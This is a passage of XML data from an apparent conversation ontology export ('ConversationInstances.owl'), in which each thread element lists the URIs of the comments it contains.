	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_50</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473523
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472101
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_114</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471553
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_79</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482273
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_65</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471599
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_23</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471509
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472099
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_138</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471477
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_149</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475429
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_124</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472357
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_89</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472017
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_87</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478845
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_31</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471197
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_109</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471159
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_101</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28487211
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_95</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471403
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_41</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472457
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_119</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472381
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478875
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_111</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477551
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470953
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477985
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473605
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_26</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472383
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_74</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471181
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471845
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_36</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471167
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473347
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_82</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476047
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_141</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471397
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_148</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473285
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_44</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472913
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_92</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471259
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_154</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471347
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477787
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_54</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471225
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476217
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_100</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474693
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28484675
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_63</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472293
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_39</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471789
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28485403
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_25</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473271
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_71</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471753
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_130</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473159
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476933
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_49</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472539
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_33</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480147
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_81</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472139
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_140</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472535
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_103</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476437
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_151</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473235
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_57</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472395
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_68</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471391
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_43</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472685
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_127</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472359
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471287
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_113</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28489637
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_78</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471513
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_20</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471473
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_137</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473063
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_129</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472745
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_121</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472691
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_84</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474347
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_30</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471663
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_139</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471549
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_143</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471873
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_108</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473503
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_94</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_116</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476723
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_102</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478241
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470925
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471415
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471555
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_67</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480067
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_126</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472287
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_110</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475157
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_73</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478229
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_134</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473511
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_145</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472247
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_132</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476521
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_97</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471971
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_83</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482069
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_142</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471141
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_153</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474525
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_59</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477229
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472693
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_91</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471737
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_28</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471665
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_60</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471589
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478881
